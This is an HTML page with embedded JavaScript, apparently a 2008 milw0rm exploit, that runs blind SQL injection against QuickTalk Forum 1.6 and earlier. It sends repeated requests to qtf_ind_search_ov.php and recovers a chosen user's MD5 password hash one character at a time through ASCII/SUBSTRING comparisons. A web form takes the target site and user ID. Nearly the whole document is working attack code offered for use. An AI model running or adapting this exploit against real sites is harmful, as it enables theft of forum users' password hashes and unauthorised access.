<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
	-----------------------------------------------------------------------------------------------
	- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
	- Info ---------------------------------------------------------------------------------------
	- Author: t0pP8uZz & xprog -----------------------------------------------------------
	- Exploit Coded By t0pP8uZz ---------------------------------------------------------
	- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
	----------------------------------------------------------------------------------------------
	- Passwords ARE IN MD5           ----------------------------------------------------
	- Peace -----------------------------------------------------------------------------------
	---------------------------------------------------------------------------------------------
*/

var site, uid, res = "";

function Start() {
	
	site = document.getElementById("site").value;
	uid  = document.getElementById("pid").value;
	document.getElementById("output").value = "Exploiting, Please Wait..";
	
	Main(1, 48);
}

function Main(substr, num) {

	var xmlhttp = false;
	var url     = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
	
	try {
		xmlhttp = new XMLHttpRequest();
	} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
	
	if(xmlhttp) {
	
		netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
		xmlhttp.onreadystatechange = function() {
		
			if(xmlhttp.readyState == 4) {
			
				var content = xmlhttp.responseText;
				
				var ele = document.getElementById("output");
				if(!content.match(/0 Found/i)) {
					res += String.fromCharCode(num);
					ele.value = res;
					num = 48;
					substr++;
				}
				else {
					if(num == 59) { num = 96; }
					else { num++; }
				}
				
				if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
				Main(substr, num)
			}
		};
		xmlhttp.open("GET", url, true);
		xmlhttp.send(null);
	}
}

</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

# milw0rm.com [2008-03-12]
